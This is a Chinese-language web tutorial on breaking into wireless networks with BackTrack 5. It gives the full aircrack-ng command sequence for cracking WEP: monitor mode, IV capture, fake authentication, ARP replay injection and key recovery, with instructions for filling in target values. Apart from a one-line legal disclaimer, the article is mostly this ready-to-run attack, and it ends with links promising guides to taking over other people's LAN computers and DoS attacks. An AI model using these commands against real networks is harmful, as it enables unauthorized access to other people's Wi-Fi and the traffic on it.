Backtrack一直都被當作WEP密碼解除的首選系統(tǒng), BackTrack 5和之前的BackTrack 3和BackTrack 4一樣集成了解除無線密碼的工具并且支持更多型號的網(wǎng)卡. 3分鐘解除一個用WEP加密方式的無線網(wǎng)絡用BackTrack 5是完全可能的.下面是學習啦小編給大家整理的一些有關(guān)backtrack5入侵局域網(wǎng)教程，希望對大家有幫助!

backtrack5入侵局域網(wǎng)教程

非法解除他人的無線網(wǎng)絡等同犯罪, 請以自己的無線網(wǎng)絡作為實驗環(huán)境.

首先, 需要準備:

1.BackTrack 5 光盤版或者虛擬機鏡像, 也可以是Backtrack5 U盤版

2.一個兼容Backtrack的無線網(wǎng)卡

3.使用WEP加密的無線網(wǎng)絡加入點(指的就是你要解除的無線網(wǎng)絡)

點擊進入Backtrack5系統(tǒng)下載

需要的全部指令:

(請根據(jù)實際情況替換粗體部分)

1) ifconfig -a

(可以查看到自己機子無線網(wǎng)卡的MAC地址和無線網(wǎng)卡的設備名稱), 保留這個窗口方便下幾步查看需要的信息, 打開新命令窗口進入一步)

2) airmon-ng start wlan0 2

(wlan0為無線網(wǎng)卡, 2為需要監(jiān)聽的頻道, 根據(jù)自己情況輸入, 此步驟為打開無線網(wǎng)卡的監(jiān)聽模式)

3) airodump-ng –ivs -w name -c 2 wlan0

(獲取頻道2的所有無線AP的信息, wlan0是無線網(wǎng)卡, 2為頻道, 這一步的頻道需要跟上一步的一致, 命令輸入后會顯示周圍所有頻道為*的無線AP,

顯示的列表:

BSSID : 無線AP的Mac 地址

PWR： AP信號的大小

RXQ： 干擾值

Beacons：發(fā)送和接受的數(shù)據(jù)包, 有數(shù)據(jù)傳輸?shù)臅r候就會跳動

#Data： 數(shù)據(jù), 解除需要的最關(guān)鍵的就是這個

CH：頻道

MB：網(wǎng)絡連接速度

ESSID： AP的名稱

保留這一窗口, 打開新的命令窗口進入下一步)

4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0

(發(fā)送欺騙, ap_essid為AP的名稱, 例如Linksys或者TP-Link, ap_mac為AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXX為自己無線網(wǎng)卡的MAC地址, 第一步可以看到. 這一步成功后會顯示Successful, 如不成功需要在信號強的地方重試, 成功后才可以進入下一步)

5) aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 wlan0

(ap_mac為無線AP的mac地址, 具體看步驟3, XXXXXXXX為無線網(wǎng)卡的mac地址, wlan0為網(wǎng)卡, 這一步執(zhí)行以后, 開始正確的收發(fā)數(shù)據(jù)包, #Data開始上漲)

6) aircrack-ng -n 64 -b ap_mac name-*.ivs

(開始解除, ap_mac為ap的mac地址, 64指的是使用了64位加密, 多次解除失敗的話可以試128)

多數(shù)情況下當#data開始迅速跳動的時候就可以開始解除了, 不需要等到多少包, 如果#data這個數(shù)據(jù)增長緩慢的話, 換個位置到無線信號強的地方再試, 命令輸入正確的話最快3分鐘搞定一個64位加密的WEP AP是沒問題的! e網(wǎng)軟摘測試時用的USB網(wǎng)卡, 如果使用內(nèi)置無線網(wǎng)卡性能上會提升很多.

看了“backtrack5怎么入侵局域網(wǎng)”的人還看了

1.局域網(wǎng)入侵如何做到的

2.怎樣入侵局域網(wǎng)電腦

3.局域網(wǎng)內(nèi)部入侵怎么防止

4.怎樣用局域網(wǎng)強制控制別人電腦

5.教你如何搶掉局域網(wǎng)內(nèi)所有IP

6.局域網(wǎng)怎么進入別人電腦(2)

7.局域網(wǎng)內(nèi)如何保證局域網(wǎng)的安全

8.怎么Dos入侵

9.淺談局域網(wǎng)安全十大威脅

10.怎么禁止局域網(wǎng)用戶訪問電腦的幾個辦法